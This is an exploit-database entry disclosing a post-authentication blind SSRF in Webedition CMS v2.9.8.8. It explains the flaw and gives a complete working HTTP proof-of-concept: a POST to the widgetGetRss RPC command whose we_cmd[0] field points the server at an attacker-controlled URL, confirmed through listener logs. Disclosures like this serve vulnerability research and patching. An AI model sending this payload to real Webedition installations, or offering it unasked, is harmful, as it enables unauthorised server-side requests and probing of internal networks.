## https://sploitus.com/exploit?id=PACKETSTORM:175021
Exploit Title: Webedition CMS v2.9.8.8 - Blind SSRF  
Application: Webedition CMS  
Version: v2.9.8.8   
Bugs: Blind SSRF  
Technology: PHP  
Vendor URL: https://www.webedition.org/  
Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1  
Date found: 07.09.2023  
Author: Mirabbas Ağalarov  
Tested on: Linux   
  
  
2. Technical Details & POC  
========================================  
Place a URL on a host you control (for example https://youserver/test.xml) in the we_cmd[0] parameter of the widgetGetRss RPC command. The server fetches that URL as an RSS feed. "Blind" here means the fetched content is not reflected in the response, so the only evidence of the bug is the inbound request arriving at your host; confirm it by watching your web server or listener logs. Note that the request below carries an authenticated backend session (the WESESSION cookie), so this is a post-authentication issue.  
  
PoC request  

```http
POST /webEdition/rpc.php?cmd=widgetGetRss&mod=rss HTTP/1.1
Host: localhost
Content-Length: 141
sec-ch-ua: 
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/webEdition/index.php?we_cmd[0]=startWE
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: treewidth_main=300; WESESSION=41a9164e60666254199b3ea1cd3d2e0ad969c379; cookie=yep; treewidth_main=300
Connection: close

we_cmd[0]=https://YOU-SERVER/test.xml&we_cmd[1]=111000&we_cmd[2]=0&we_cmd[3]=110000&we_cmd[4]=&we_cmd[5]=m_3
```